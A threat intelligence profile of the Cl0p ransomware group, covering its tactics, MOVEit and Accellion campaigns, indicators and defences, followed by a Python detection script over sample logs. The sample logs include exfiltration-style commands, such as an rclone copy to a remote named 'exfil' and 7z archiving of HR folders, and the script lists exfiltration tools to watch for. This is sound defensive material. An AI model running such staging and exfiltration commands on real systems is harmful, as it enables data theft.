Cl0p

1. Overview

Cl0p is a high-impact ransomware group operating under a double extortion model, best known for its targeted exploitation of enterprise file transfer systems and public data leaks involving some of the world’s largest organisations. Active since at least 2019, Cl0p (also styled as Clop) operates a sophisticated, financially motivated operation that combines custom ransomware tooling, advanced vulnerability exploitation, and a well-maintained leak portal.

The group gained international notoriety in 2021 for its exploitation of Accellion FTA, and again in 2023 with its mass exploitation of MOVEit Transfer—a supply chain-level incident affecting hundreds of global enterprises. Cl0p has specifically targeted firms in finance, legal, healthcare, energy, education, and government sectors, with multiple victims based in the UK and Europe.


2. Origin and Evolution

Cl0p is believed to be operated by FIN11, a financially motivated cybercrime group linked to Eastern Europe. The group first emerged as a variant of the CryptoMix ransomware family before evolving into an autonomous toolset, complete with custom encryptors, C2 infrastructure, and automated exfiltration capabilities.

Unlike traditional Ransomware-as-a-Service (RaaS) groups, Cl0p appears to operate as a closed group, maintaining tight control over its campaigns and infrastructure. Over time, Cl0p has shifted its focus away from encryption-only operations to data-centric extortion, in some cases skipping encryption entirely and relying solely on the threat of data exposure.


3. Tactics, Techniques, and Procedures (TTPs)

Cl0p employs a highly targeted approach to intrusion, with a focus on exploiting known vulnerabilities in enterprise-grade software. Their tactics include:

  • Initial Access:
    Exploitation of zero-day vulnerabilities in managed file transfer platforms such as MOVEit, GoAnywhere, and Accellion FTA (T1190). Occasionally uses phishing (T1566.001) and credential abuse (T1078).
  • Lateral Movement:
    Use of PsExec, RDP, and PowerShell for internal traversal (T1021), with a focus on quickly identifying backup servers and domain controllers.
  • Data Exfiltration:
    Exfiltration via Rclone, MEGA.nz, and custom scripts that automate archive creation and staging for transfer (T1041). Data is carefully selected for reputational impact.
  • Encryption (when used):
    Custom Cl0p payloads apply AES encryption and rename files with .clop or .CLOP extensions. The group sometimes opts not to encrypt and solely demands ransom for withheld data.
  • Persistence & Evasion:
    Uses registry edits (T1112), disables antivirus, clears logs, and leverages LOLBins to avoid triggering behavioural analytics (T1036).

4. Targeting Profile

Cl0p focuses almost exclusively on large enterprises, particularly those with:

  • Regulatory exposure (e.g., GDPR, HIPAA)
  • High-value client or customer datasets
  • Weak segmentation between user-facing services and internal data repositories

Frequent targets include:

  • Financial institutions
  • Legal and accounting firms
  • Universities and colleges
  • Retail and manufacturing supply chains
  • UK local councils and NHS contractors

Organisations in the UK, Germany, United States, and Australia have featured prominently on Cl0p’s leak site.


5. Notable Campaigns and Victims

Cl0p has been responsible for some of the largest data extortion events on record. Notable incidents include:

  • MOVEit Transfer Exploitation (2023):
    A mass attack exploiting a zero-day vulnerability in Progress Software’s MOVEit platform. Victims included Shell, British Airways, BBC, and Zellis, affecting payroll and HR data across the UK.
  • Accellion FTA Campaign (2021):
    Exploited a vulnerability in the legacy Accellion file transfer appliance, affecting Trinity Health, Bombardier, and Stanford University.
  • South Korean Retail Breach (2020):
    Targeted multiple large corporations, exfiltrating and leaking sensitive financial and HR data.

Cl0p typically publishes victims on its “CL0P^_- LEAKS” dark web portal, complete with branding, sample data, and countdowns to full release.


6. Ransomware and Leak Site Behaviour

Cl0p’s leak site is a central tool in their extortion playbook, offering:

  1. Branded listings of victims, often with logos and sector information
  2. Data previews to prove authenticity
  3. TOR-based portals for negotiation
  4. Public countdowns to data release

The group’s communications are professional but coercive, frequently citing the legal and reputational consequences of non-payment. Ransom demands have ranged from £250,000 to £15 million, with larger demands reserved for multinational organisations.


7. Technical Indicators

Common indicators of Cl0p ransomware activity include:

  • File artifacts: encrypted files renamed with .clop or .CLOP extensions, and a file named .CLOP_README.txt
  • Known exploit chains tied to MOVEit, Accellion, and GoAnywhere
  • Use of rclone.exe, 7z.exe, and MEGA links for data exfiltration
  • PowerShell scripts executed via WMI
  • Deployment from admin shares using PsExec

Updated IOCs and detection signatures are maintained by UK Cyber Defence Ltd.


8. Defensive Measures and Recommendations

To defend against Cl0p ransomware:

  • Patch managed file transfer software (MOVEit, GoAnywhere, Accellion) immediately
  • Enforce multi-factor authentication for all external-facing services
  • Monitor for Rclone, PowerShell, and archive creation at scale
  • Implement network segmentation, particularly isolating file transfer environments
  • Maintain immutable backups, stored offline and tested quarterly
  • Subscribe to threat intelligence feeds for early warning of exploited vulnerabilities
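As an added example (not the page's own content and not UK Cyber Defence Ltd's detection signatures), the Python routine below turns the indicators in section 7 and the "monitor for Rclone, PowerShell, and archive creation at scale" advice in section 8 into rules run over constructed process-creation records; the pipe-delimited log format, hostnames, paths and the archive burst threshold are all assumptions.

```python
"""Rule-based triage of process-creation events for the Cl0p indicators listed above.
Added example, not UK Cyber Defence Ltd tooling. Each constructed log record is
pipe-delimited: timestamp|host|parent_image|image|command_line"""
from collections import Counter

# Constructed sample events (not real telemetry): one file server, one DC, one workstation.
SAMPLE_LOG = """\
2025-05-01T02:10:11Z|FS01|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt
2025-05-01T02:11:40Z|FS01|WmiPrvSE.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -c Get-ChildItem D:\\HR
2025-05-01T02:12:05Z|FS01|cmd.exe|C:\\Tools\\7z.exe|7z.exe a -p D:\\staging\\hr1.7z D:\\HR\\payroll
2025-05-01T02:12:09Z|FS01|cmd.exe|C:\\Tools\\7z.exe|7z.exe a -p D:\\staging\\hr2.7z D:\\HR\\contracts
2025-05-01T02:12:14Z|FS01|cmd.exe|C:\\Tools\\7z.exe|7z.exe a -p D:\\staging\\hr3.7z D:\\Legal
2025-05-01T02:15:30Z|FS01|cmd.exe|C:\\Tools\\rclone.exe|rclone.exe copy D:\\staging remote:exfil --transfers 8
2025-05-01T02:20:00Z|DC01|services.exe|C:\\Windows\\PSEXESVC.exe|PSEXESVC.exe
2025-05-01T02:20:03Z|DC01|PSEXESVC.exe|\\\\DC01\\ADMIN$\\run.exe|run.exe
2025-05-01T09:00:00Z|WS07|explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-Date
"""

ARCHIVE_BURST_THRESHOLD = 3  # 7z archive creations per host before treating it as staging "at scale"

def parse(line):
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent.lower(), "image": image.lower(), "cmd": cmd.lower()}

def triage(log_text):
    """Return (alerts, archive_counts); each alert is (host, rule, timestamp)."""
    alerts, archives = [], Counter()
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        e = parse(raw)
        name = e["image"].rsplit("\\", 1)[-1]          # image file name only
        # Exfiltration tooling: rclone binary or a MEGA URL on the command line.
        if name == "rclone.exe" or "mega.nz" in e["cmd"]:
            alerts.append((e["host"], "exfil-tool (rclone/MEGA)", e["ts"]))
        # Staging: 7z 'a' (add to archive); alert once a host crosses the burst threshold.
        if name == "7z.exe" and e["cmd"].split()[1:2] == ["a"]:
            archives[e["host"]] += 1
            if archives[e["host"]] == ARCHIVE_BURST_THRESHOLD:
                alerts.append((e["host"], "archive-creation-burst", e["ts"]))
        # PowerShell launched by the WMI provider host rather than a user shell.
        if name == "powershell.exe" and e["parent"] == "wmiprvse.exe":
            alerts.append((e["host"], "powershell-via-wmi", e["ts"]))
        # PsExec service binary, or an image executed straight from an ADMIN$ share.
        if name == "psexesvc.exe" or (e["image"].startswith("\\\\") and "admin$" in e["image"]):
            alerts.append((e["host"], "psexec/admin-share-execution", e["ts"]))
    return alerts, archives

if __name__ == "__main__":
    for host, rule, ts in triage(SAMPLE_LOG)[0]:
        print(f"{ts} {host} {rule}")
```

The ordinary workstation PowerShell session on WS07 produces no alert, which is the point of keying on the WMI parent and the archive burst rather than on the binaries alone.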

9. Attribution and Alliances

Cl0p is widely believed to be operated by FIN11, a financially motivated cybercriminal group with links to Russian-speaking underground forums. The group does not operate as a public affiliate programme, but may collaborate with initial access brokers and malware-as-a-service providers.

Despite law enforcement takedowns of its infrastructure in 2021, Cl0p has rebuilt and remained active—indicating a resilient and decentralised operational model.


10. Conclusion

Cl0p is one of the most dangerous and strategically agile ransomware groups currently operating. Its ability to exploit enterprise software vulnerabilities at scale, bypass traditional defences, and pressure victims through high-profile data leaks makes it a priority threat for UK organisations, particularly those in finance, legal, education, and supply chain sectors.

Proactive defence, visibility into data flows, and readiness to respond to data theft—not just encryption—are essential to mitigating Cl0p’s impact.


Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025
